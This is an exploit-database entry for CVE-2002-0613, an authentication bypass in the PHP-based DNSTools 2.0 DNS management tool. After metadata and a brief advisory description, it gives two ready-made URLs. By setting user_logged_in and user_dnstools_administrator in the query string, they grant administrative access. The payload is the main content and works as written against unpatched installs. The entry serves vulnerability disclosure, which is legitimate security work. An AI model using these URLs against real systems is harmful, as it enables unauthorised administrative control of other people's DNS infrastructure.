[] NeoSense
E X P L O I T S
title author type platform port cve id

DNSTools 2.0 - Authentication Bypass

Author: ppp-design
type: webapps
platform: php
port: 
date_added: 2002-04-28 
date_updated: 2012-09-21 
verified: 1 
codes: CVE-2002-0613;OSVDB-5176 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/4617/info

DNSTools is a web based managment tool for DNS information. It is implemented in PHP, and available for Linux and Solaris.

A vulnerability has been reported in some versions of DNSTools which allows any remote attacker to gain administrative access. An artificially constructed URL may define variables used to track user authentication and administrative access.

http://www.example.com/dnstools.php?section=hosts&user_logged_in=true
http://www.example.com/dnstools.php?section=security&user_logged_in=true&user_dnstools_administrator=YES
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.